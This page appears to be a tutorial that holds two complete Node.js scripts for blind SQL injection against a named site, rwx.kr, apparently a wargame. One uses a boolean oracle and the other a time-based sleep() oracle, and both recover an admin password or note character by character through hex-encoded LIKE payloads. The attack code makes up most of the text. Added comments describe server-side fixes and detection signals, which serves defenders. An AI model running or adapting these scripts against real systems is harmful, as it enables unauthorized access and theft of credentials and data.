
SQL Injection with Node.js

Blind

const request = require('request');
// Candidate characters tried at each position. The oracle below only reports whether the
// current prefix matches, so the value is recovered one character at a time. Only lowercase
// letters are listed — presumably the target column's collation is case-insensitive (unverified
// here). Note that `_` is itself a single-character LIKE wildcard, so it can match at any position.
const dict = '0123456789abcdefghijklmnopqrstuvwxyz={/}:.,_';

// Builds the `request` options for one boolean-oracle probe.
// NOTE(review): assigned without const/let, so `option` is an implicit global (strict mode rejects this).
// The injected `pw` value closes the quoted string, forces the lookup to id = 0x61646d696e
// ('admin' as a hex literal), and compares the password with LIKE against the hex-encoded
// prefix followed by 0x25 ('%'); the trailing `#` comments out the remainder of the original
// statement. Because everything is hex-encoded the payload contains no quote characters,
// which matters when writing detection rules for this traffic.
// Server-side, this class of bug is closed by binding `pw` as a query parameter instead of
// interpolating it into the SQL text.
option = (query) => ({
	"headers": {
		"Host": "rwx.kr",
		"User-Agent": "Mozilla/5.0",
		"Accept": "text/html",
		"Cookie": "PHPSESSID=posix"
    },
    "qs": { "pw" : `' || id=0x61646d696e && pw like 0x${Buffer.from(query).toString('hex')}25 #`},
	"method": "GET",
	"uri": "http://rwx.kr/page.php"
});

/**
 * Recovers the target value one character at a time using a textual oracle.
 * For the current prefix `data`, one request per candidate character is issued; all of
 * them are in flight concurrently because `request` is callback-based. A response body
 * containing 'Hello admin' means the LIKE prefix matched: the longer prefix is printed and
 * the search continues from it. There is no explicit termination check — the recursion
 * simply stops once no candidate matches.
 * Caveats: on a transport error `body` is expected to be undefined, so `.indexOf` throws
 * with nothing catching it; and since every matching branch recurses in parallel, at least
 * |dict| requests are sent per recovered character. From the server's side that is a burst
 * of near-identical GETs to page.php differing only in the `pw` hex literal — a useful
 * detection signal alongside fixing the query itself.
 * @param {string} [data=''] - prefix recovered so far
 */
function exploit(data = '') {
    for (let chr of dict) {
        request(option(data + chr), function(err, res, body) {
            if (body.indexOf('Hello admin') !== -1) {
                console.log(data + chr);
                exploit(data + chr);
            }
        });
    }
}

// Entry point: start the enumeration from the empty prefix.
exploit();

Time-based Blind

const request = require('request-promise');
// Candidate characters per position (same one-character-at-a-time enumeration as the
// boolean-oracle variant above; `_` is itself a single-character LIKE wildcard).
const dict = '0123456789abcdefghijklmnopqrstuvwxyz:={}./_';
// Seconds the injected sleep() holds the response; the client treats any round trip
// longer than this as a match.
const delay = 2;

// Builds the `request-promise` options for one time-based probe.
// The POST body injects into the `order` parameter: a subquery reads
// concat(title, 0x3a, contents) (0x3a is ':') from `note` for id = 0x61646d696e ('admin'),
// compares it with LIKE against the hex-encoded prefix plus 0x25 ('%'), and appends
// `and sleep(delay)` so that only a matching prefix delays the response. Nothing in the
// response text is inspected — only its timing — which is what makes this variant work
// where no 'Hello admin' style marker is available.
// Server-side note: an ORDER BY operand cannot be bound as a query parameter, so the fix
// is validating `order` against an allow-list of column names rather than parameterizing.
// Detection: POST bodies carrying `sleep(` together with a LIKE hex literal, and a subset
// of requests to the same URI that consistently take about `delay` seconds.
const option = (query) => ({
	"headers": {
		"Host": "rwx.kr",
		"User-Agent": "Mozilla/5.0",
		"Content-Type": "application/x-www-form-urlencoded",
		"Cookie": "PHPSESSID=posix"
	},
    "body": `order=(select concat(title,0x3a,contents) from note where id=0x61646d696e)` +
            `like 0x${Buffer.from(query).toString('hex')}25 and sleep(${delay})`,
	"method": "POST",
	"uri": "http://rwx.kr/"
});


/**
 * Time-based variant of the enumeration. Probes run sequentially (each request is
 * awaited), and a match is inferred when the round trip exceeds `delay` seconds; on a
 * match the longer prefix is printed and the search continues from it. The function
 * resolves once no candidate exceeds the threshold.
 * Caveats: the measurement includes network latency and server load, so a slow but
 * non-matching response is misread as a match; `request-promise` rejects on a non-2xx
 * status by default and nothing here catches it, so a single error ends the run;
 * `var` is used where `const` would do, and `query` is computed but `data + chr` is
 * rebuilt in the match branch.
 * Defender's view: the lasting fix is removing the injection, but the traffic shape —
 * sequential POSTs to one URI with a fraction taking almost exactly `delay` seconds —
 * is distinctive enough to alert on.
 * @param {string} [data=''] - prefix recovered so far
 * @returns {Promise<void>}
 */
async function exploit(data = '') {
    for (let chr of dict) {

        var query = data + chr
        var begin = new Date().getTime();

        await request(option(query));

        if (new Date().getTime() - begin > delay * 1000) {
            console.log(data + chr);
            return exploit(data + chr);
        }
    }
}

// Entry point: start from the empty prefix. The returned promise is not awaited or
// caught, so a rejected request surfaces as an unhandled rejection.
exploit();
